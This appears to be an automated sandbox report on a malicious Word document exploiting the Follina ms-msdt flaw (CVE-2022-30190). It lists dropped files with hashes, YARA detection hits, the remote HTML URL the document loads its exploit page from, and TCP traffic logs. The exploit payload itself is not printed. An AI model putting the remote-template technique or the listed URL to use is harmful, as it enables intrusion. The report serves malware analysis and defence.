                                                                                                                                                              Preview:......Exif..MM.*.............C....................................................................C............................................................................".................................................................................*....4.`B.,}...3..x....:..wx.2...G.8...Z...;a..Tv..a..du"..`...Z...Y..1....s.i.c<.7....Dj...V..}y.r.:.....1z.D...sg.;.c..S`1..\9.u%...X..nDC.L.Z..-..D=..29......1:....DN..l+..P.m.U.LY=.c...-....O....._w.Mj.v.A.;..v::.`l..C.......l.)....}q..D .h.h.9.U.[...(l.Da....^...c3~Y..c.#.7HC3{....PK.n.<"..L..S.^=..D..vL....<:.(....;..J..9...V...r.I........(/H...x..j]e...;.g.........t!.H.\b[.........{...bR...x..Q.Q..}..eW.GD..........]M...Xk"#.G...x..t...mZ.-M...v)SJ.w.c...1.Jl.&2y..om.$..%..i:u1...1.{{....FIN...N8...=.)...8.7a!.lJ...h.U....6j.D~.....8._Hr.bY>M.a..z............m.+..wc."A.>..q.....?=..m.....n.CR\R.Vc.=..s...H.. ......+F..F.j.j..I.....9I.<.:{.#;...mc.gF5Ga.2gB..g..&..'...`..6..s...!..u

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5092
                                                                                                                                                              Entropy (8bit):1.5689266993578892
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
                                                                                                                                                              MD5:DA03F3022C8E3A07A6F196216B29135E
                                                                                                                                                              SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
                                                                                                                                                              SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
                                                                                                                                                              SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, Author: Joe Security
                                                                                                                                                              Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{12FCD2A2-2042-4667-BB36-257049CA1904}.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1536
                                                                                                                                                              Entropy (8bit):1.312888549670333
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:W4ofylIcElClbYS7plQalvbK/SterHr4PxZUttrasD3B9d4XsDRv1:9oal7MClc2HK/rLGZmra4Bn4X6N
                                                                                                                                                              MD5:451EC25F416BC912608235442FF2F166
                                                                                                                                                              SHA1:F888C9778D1C7EBF3866D0C58500DB59171DCBB3
                                                                                                                                                              SHA-256:334A4E952D4B5D75EEB8A85978592B6DA7147803188641EECF69A7A4726E858A
                                                                                                                                                              SHA-512:2F871BFB230404A4718D1AB1C96DB79EB617DE4689B2B7957246F5E12143E1688C0CC54B81DF214818F31463D4FC33E4F23D104F7D65424B335867B824457F1D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..M.O.T.D.............L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.s.:././.c.y.b.e.r.l.e.a.g.u.e...c.o./.t.h.1.s...h.t.m.l.!.". .".". .\.b..... . ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{B65E71D2-803B-40A2-8E3C-9EA33F7B9F39}.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1024
                                                                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):5092
                                                                                                                                                              Entropy (8bit):1.5689266993578892
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
                                                                                                                                                              MD5:DA03F3022C8E3A07A6F196216B29135E
                                                                                                                                                              SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
                                                                                                                                                              SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
                                                                                                                                                              SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, Author: Joe Security
                                                                                                                                                              IE Cache URL:https://cyberleague.co/th1s.html
                                                                                                                                                              Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\20220531_180800.rtf.LNK

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:43 2022, mtime=Sat Jun 4 05:03:25 2022, atime=Sat Jun 4 05:03:05 2022, length=199522, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1080
                                                                                                                                                              Entropy (8bit):4.662475618409437
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:8JU0UQuElPCH2bQtfiYIeF+WVBUWQqAjAsg/2KYDwG5y35yp4t2Y+xIBjKZm:8+3t75BUBtAsgmDwj67aB6m
                                                                                                                                                              MD5:1A876E870976DC0047C960C625D6B81F
                                                                                                                                                              SHA1:E7CE531CEA5DF1032015A4C6B6F6A5512CB94918
                                                                                                                                                              SHA-256:816BBF82C865204A0FA8BC08FABD97B3E0ED6FC4D45E8D26BC2B8B956E592B6B
                                                                                                                                                              SHA-512:B978B808E8712EFD9B2DC27265915BB5ACCBF59148C2FF1DAC9CC9CBADC226DC289494297142C4E0D078DA38B22330C87270251EB5F8C7643A88FE776631C355
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview:L..................F.... ........3.......w.......w..b............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...TZ0....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..TZ0.....S....................D.;.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..TZ0.....Y..............>.......'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2.b....Tc0 .202205~1.RTF..X......hT...Tc0....h.....................C...2.0.2.2.0.5.3.1._.1.8.0.8.0.0...r.t.f.......Y...............-.......X...........>.S......C:\Users\user\Desktop\20220531_180800.rtf..*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.0.2.2.0.5.3.1._.1.8.0.8.0.0...r.t.f.........:..,.LB.)...As...`.......X.......768287...........!a..%.H.VZAj...>............-..!a..%.H.VZAj...>............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):96
                                                                                                                                                              Entropy (8bit):4.639669008145431
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:bDuMJlHDInDdrFomxWIMovPDInDdrFov:bCBzNczy
                                                                                                                                                              MD5:C5F054026C8061C622BB0F1DAB7A99B0
                                                                                                                                                              SHA1:BD0930F6F9CF853909D7FDE6ED4690A517D456A3
                                                                                                                                                              SHA-256:E3805EFA3C64718616E0376881EA4E39FD164075412D0485F345138120AD9853
                                                                                                                                                              SHA-512:15D8C875F424C633DCE521147A2583E3AC93D749B4E5771C64802488F0F04DFD405458AF5B235857BD94ADC326A06765A5968BDB516754E87536ED8C51EACB89
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[folders]..Templates.LNK=0..20220531_180800.rtf.LNK=0..[misc??????]..20220531_180800.rtf.LNK=0..

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):162
                                                                                                                                                              Entropy (8bit):2.1027108526921086
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Rl/ZdfXGMl9/nTRdttl/dptJ:RtZdWMldTRXdptJ
                                                                                                                                                              MD5:0182DAC577AA3F876A2B371C3476C9DB
                                                                                                                                                              SHA1:19149426C4E2513AE4D18C4CDD213B31CD04C4DF
                                                                                                                                                              SHA-256:AC5A33C45B852FEFAC49BA2A7E5808EF599902722B6A11E8FFF9310DFDA058F2
                                                                                                                                                              SHA-512:A6196D173F73408376470CC011FBCE00B27B53A40F4EF4C1AEF0AA43FEBF435B9036149B57A7E8DACF50568DF354EF527C74E7CEB87110ECA1D56D1077EE831A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h.........+'qc.3........................../'uc-4..........................#'yc45..........T...

                                                                                                                                                              C:\Users\user\Desktop\~$220531_180800.rtf

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):162
                                                                                                                                                              Entropy (8bit):2.1027108526921086
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Rl/ZdfXGMl9/nTRdttl/dptJ:RtZdWMldTRXdptJ
                                                                                                                                                              MD5:0182DAC577AA3F876A2B371C3476C9DB
                                                                                                                                                              SHA1:19149426C4E2513AE4D18C4CDD213B31CD04C4DF
                                                                                                                                                              SHA-256:AC5A33C45B852FEFAC49BA2A7E5808EF599902722B6A11E8FFF9310DFDA058F2
                                                                                                                                                              SHA-512:A6196D173F73408376470CC011FBCE00B27B53A40F4EF4C1AEF0AA43FEBF435B9036149B57A7E8DACF50568DF354EF527C74E7CEB87110ECA1D56D1077EE831A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h.........+'qc.3........................../'uc-4..........................#'yc45..........T...

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:Microsoft OOXML
                                                                                                                                                              Entropy (8bit):7.9948510704789975
                                                                                                                                                              TrID:
                                                                                                                                                              • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                              • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                              • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                              File name:20220531_180800.rtf
                                                                                                                                                              File size:199522
                                                                                                                                                              MD5:7b9c8e08371550238fbcd7cee1c8087d
                                                                                                                                                              SHA1:ff8c9deb358b2d22aa086cf36406461e8e9978b2
                                                                                                                                                              SHA256:b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5
                                                                                                                                                              SHA512:962c4c0a48519ffa81a95771b25987cc6aeed4bb8737e1e5ab242233f849370d72675f08da3628270bad410659772f437209d7f02bed089b5a220f97314ec1f4
                                                                                                                                                              SSDEEP:3072:LP/BkCPAXydgrYOUIr0XX95JQ7Anr5w2wJLWsk2n3rYxNYlT+MaJis19s9k:b/qXySM3XtQMnrq2Jon3MfYoL19s9k
                                                                                                                                                              TLSH:7814131876E61EB9C60F3BB6B875A1076B9F0017EC14D2BF0C6065F98931964B670F8B
                                                                                                                                                              File Content Preview:PK..........!....iw...........[Content_Types].xml.T.n.0..W.? _#p.CUU!9t96..~.1.q.M...}.HQ........y..f........F.d..I...\.2%.....D>0.3i4.d..L'.7.......}J.!.GJ=_.b>1.4".q..<..Z.?Y..n8.....:... ..3.l-C....M.Lh.=5u.UJ..Rp.........(.....BJb$....@h.>..H_.*....n.

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                              Network Behavior

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jun 3, 2022 23:03:12.042546988 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.042619944 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.042687893 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.043098927 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.043123007 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.441701889 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.441899061 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.594789982 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.594856024 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.595130920 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.597747087 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.644520998 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.826128006 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.826225042 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.826323032 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.839334011 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.839390993 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.839407921 CEST49741443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.839416027 CEST4434974113.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.925065994 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.925132036 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:12.925210953 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.926445961 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:12.926471949 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:13.308842897 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:13.313462019 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:13.313499928 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:13.314897060 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:13.314929008 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:13.685409069 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:13.685566902 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:13.685663939 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:13.685729027 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:13.685750008 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:13.685764074 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:13.685776949 CEST49744443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:13.685785055 CEST4434974413.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:16.733316898 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:16.733378887 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:16.733489990 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:16.733768940 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:16.733787060 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.141038895 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.141642094 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:17.141695976 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.142771006 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:17.142786026 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.544548035 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.544698954 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.544766903 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:17.544823885 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.544878960 CEST49746443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:17.544899940 CEST4434974613.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.729070902 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:17.729166031 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:17.729268074 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:17.729895115 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:17.729923964 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.112638950 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.112771988 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.122047901 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.122102022 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.122711897 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.122807026 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.123374939 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.164509058 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.487524033 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.487576008 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.487673044 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.487715006 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.487747908 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.487756968 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.488909006 CEST49747443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.488945007 CEST4434974713.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.696450949 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.696521044 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:18.696635008 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.696944952 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:18.696978092 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:19.077434063 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:19.077559948 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.077939987 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.077960014 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:19.082124949 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.082139015 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:19.454433918 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:19.454556942 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:19.454586983 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.454638958 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.454749107 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.454785109 CEST4434974813.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:19.454799891 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.454858065 CEST49748443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.638972998 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.639030933 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:19.639137030 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.639359951 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:19.639388084 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.015038967 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.015166998 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.015516996 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.015528917 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.019237041 CEST49749443192.168.2.313.250.15.191
                                                                                                                                                              Jun 3, 2022 23:03:20.019248009 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.387357950 CEST4434974913.250.15.191192.168.2.3
                                                                                                                                                              Jun 3, 2022 23:03:20.387470961 CEST4434974913.250.15.191192.168.2.3
